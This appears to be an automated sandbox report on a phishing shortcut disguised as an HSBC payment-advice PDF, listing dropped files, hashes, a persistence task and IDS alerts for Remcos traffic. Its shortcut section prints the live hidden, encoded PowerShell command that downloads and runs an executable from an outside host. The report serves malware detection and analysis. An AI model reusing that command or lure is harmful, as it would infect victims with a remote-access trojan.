C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.363556437014245
Encrypted:	false
SSDEEP:	48:RWSU4y4RQmFoULF+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:RLHyIFKEDZ2KRHWLOuggs
MD5:	406FF51DCA6F33CA8E191F5361B05D10
SHA1:	1C2583E0C85B63AD372DE8F232D5946FA427B74F
SHA-256:	3A51ECFA97A62C7C0511F88A1F4E6E53796DD9421AF547146CB21CB82666E688
SHA-512:	6CD51AC3068A16BD25C06797DB293E5B1B4C79C23B920DA6284F517A93377B4FC738AD0FEDC68E61290FA3E4A08CD2F31B47528BAB0CB774583DCD3A84A3D48B
Malicious:	false
Preview:	@...e...........................................................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...\|...........System.Configuration4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zy55qri.qgb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dp1jvjz.432.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2llw0zql.j5t.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ybtkso1.xqh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlgirj2j.rpj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnout0tx.qs1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlpuauit.oxa.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_reosc51j.doy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcqjsk1m.f0h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfvjlsdp.w0v.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpE952.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\PuttyTest777.pif
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1575
Entropy (8bit):	5.108841078160332
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtazxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTmv
MD5:	34DB9DBEF13B776E3E5E33E9289C0046
SHA1:	3EA26ACFCB6DC556C2451D36435E806EDF91D071
SHA-256:	CB39FD2CB4FE23E72CAAE6830DE828957BE29F1BD0BF0D557791E317562DA156
SHA-512:	F114C919CB0E2B0768A33A616E5466463A4B676442C2D4A1A87BA24B3284B558D8736CA8FB75F207FBEF73B2CEF2382B816A0C76E95492D929341165E1E231B0
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpF9EC.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\HODoCxSdp.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1575
Entropy (8bit):	5.108841078160332
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtazxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTmv
MD5:	34DB9DBEF13B776E3E5E33E9289C0046
SHA1:	3EA26ACFCB6DC556C2451D36435E806EDF91D071
SHA-256:	CB39FD2CB4FE23E72CAAE6830DE828957BE29F1BD0BF0D557791E317562DA156
SHA-512:	F114C919CB0E2B0768A33A616E5466463A4B676442C2D4A1A87BA24B3284B558D8736CA8FB75F207FBEF73B2CEF2382B816A0C76E95492D929341165E1E231B0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Download File

Process:	C:\Users\user\AppData\Roaming\PuttyTest777.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	961544
Entropy (8bit):	7.9046329365332095
Encrypted:	false
SSDEEP:	24576:Yglv8Jv17LLE1hUG+n1KD9Wa9PMEgDzx9mZREOUqqHXONlVUE:oPYf+n1KDghPx9ARDhqHXOR
MD5:	3F69729A8F2B22E625BB984F28758EBC
SHA1:	AB8AAB5952DFCF0D705DAFF76448920C67B6241D
SHA-256:	D1B50FC6CE79320A88DEFEF33BAF6A51E30845BD13AB2B52F7925BA0B8F527CD
SHA-512:	C4622E82F66AA728DED76EF628BD31DDCD35581A10A6043E735E557A26C8F9C72C67713F29A3ED90F647BF268484B44CF812918A02AA8E1539C3FDAC7BCC1FA1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................l............... ........@.. ....................................@.................................p...K....................v...6........................................................... ............... ..H............text....j... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B........................H...................m....................................................0.......... .........%.?...(.....@... .........%.[...(.....\... .........%.....(......... .........%.....(......... .........%.:...(.....;...(H........&.&.(.........0..........~......~...........E........"...V...".......C....~.........,... ........w.Y..+..+..r...p.....(....o....s.............. ..... Y;..Y..+.~.........0...........~........."...........0...........(....r;..p~....o......t......*.6(H.

C:\Users\user\AppData\Roaming\PuttyTest777.pif

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	961544
Entropy (8bit):	7.9046329365332095
Encrypted:	false
SSDEEP:	24576:Yglv8Jv17LLE1hUG+n1KD9Wa9PMEgDzx9mZREOUqqHXONlVUE:oPYf+n1KDghPx9ARDhqHXOR
MD5:	3F69729A8F2B22E625BB984F28758EBC
SHA1:	AB8AAB5952DFCF0D705DAFF76448920C67B6241D
SHA-256:	D1B50FC6CE79320A88DEFEF33BAF6A51E30845BD13AB2B52F7925BA0B8F527CD
SHA-512:	C4622E82F66AA728DED76EF628BD31DDCD35581A10A6043E735E557A26C8F9C72C67713F29A3ED90F647BF268484B44CF812918A02AA8E1539C3FDAC7BCC1FA1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................l............... ........@.. ....................................@.................................p...K....................v...6........................................................... ............... ..H............text....j... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B........................H...................m....................................................0.......... .........%.?...(.....@... .........%.[...(.....\... .........%.....(......... .........%.....(......... .........%.:...(.....;...(H........&.&.(.........0..........~......~...........E........"...V...".......C....~.........,... ........w.Y..+..+..r...p.....(....o....s.............. ..... Y;..Y..+.~.........0...........~........."...........0...........(....r;..p~....o......t......*.6(H.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=18, Archive, ctime=Sun Jun 16 18:18:31 2024, mtime=Fri Jul 26 03:50:06 2024, atime=Sun Jun 16 18:18:31 2024, length=245760, window=hidenormalshowminimized
Entropy (8bit):	3.477868942532819
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	Payment Advice__HSBC Banking.pdf.lnk
File size:	2'667 bytes
MD5:	a38b0a4d0768ba8ce7c73904b55ee9ff
SHA1:	a1a13ef45fcf88eaff3dcffba1fb2608aa07e3c8
SHA256:	3f2491926888db2c9d6c7b1a426ff41e1cd4a13bc922156a814b9fe3032ff809
SHA512:	4159cd37110d910624b8bb5c837e70668b3e6d795e1ab276ea32f5ab315509dedf11bd865d4c1be41f9cec698235453996939a0ac8a45f36a28a45bdf28b7cf8
SSDEEP:	24:8WXMdJJoefe4QoJAZ5J+/iESbwptrOIw2cUbKmqCn10YaDJR2k3CN+fk4o0azTMr:8WXMyA9K3cKGZPirSNAoOTabifF
TLSH:	7451B9011EE646E8E3374B7227EDF7774761F865AA2EBF79104096808B21680EC75F39
File Content Preview:	L..................F.@.. ....I..!......I....W...!...........................5....P.O. .:i.....+00.../C:\...................V.1......XXn..Windows.@........T,.X.!....I.........................W.i.n.d.o.w.s.....Z.1......X}4..System32..B........T,.XI"......

File Icon


Icon Hash:	3bd9cb3b3b3bd94d

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\..\Windows\System32\cmd.exe
Command Line Argument:	cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
Icon location:	C:\Windows\system32\imageres.dll

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T13:03:14.929874+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49735	80	192.168.2.4	178.237.33.50
2024-07-26T13:03:08.232870+0200	TCP	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	49730	443	192.168.2.4	192.254.232.209
2024-07-26T13:03:13.537766+0200	TCP	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	49734	7983	192.168.2.4	204.10.160.230
2024-07-26T13:04:03.833862+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49744	20.114.59.183	192.168.2.4
2024-07-26T13:03:25.459572+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49738	20.114.59.183	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 13:03:07.301831961 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:07.301876068 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:07.301942110 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:07.314038038 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:07.314054966 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.008615017 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.008719921 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.013379097 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.013386011 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.013684988 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.025598049 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.068499088 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.232899904 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.232928038 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.233042002 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.233068943 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.286700964 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.299793005 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.299802065 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.299873114 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.321022034 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.321033955 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.321078062 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.321100950 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.322149992 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.322169065 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.322206020 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.322246075 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.356893063 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.356973886 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.388075113 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.388212919 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.389169931 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.389230967 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.409190893 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.409295082 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.409693956 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.409755945 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.411066055 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.411122084 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.412002087 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.412064075 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.419083118 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.419158936 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.445576906 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.445717096 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.477413893 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.477514029 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.477565050 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.477619886 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.497997046 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.498080015 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.498366117 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.498418093 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.498888969 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.498938084 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.499317884 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.499389887 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.499995947 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.500060081 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.500617981 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.500685930 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.510867119 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.510957003 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.536181927 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.536266088 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.536303997 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.536356926 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.565228939 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.565336943 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.565466881 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.565531015 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.565948009 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.566009998 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.566293001 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.566354990 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.587750912 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.587891102 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.587908030 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.587930918 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.587944031 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.587964058 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.588076115 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.588126898 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.588545084 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.588602066 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.589235067 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.589293003 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.589318037 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.589390039 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.589760065 CEST	443	49730	192.254.232.209	192.168.2.4
Jul 26, 2024 13:03:08.589826107 CEST	49730	443	192.168.2.4	192.254.232.209
Jul 26, 2024 13:03:08.589997053 CEST	443	49730	192.254.232.209	192.168.2.4
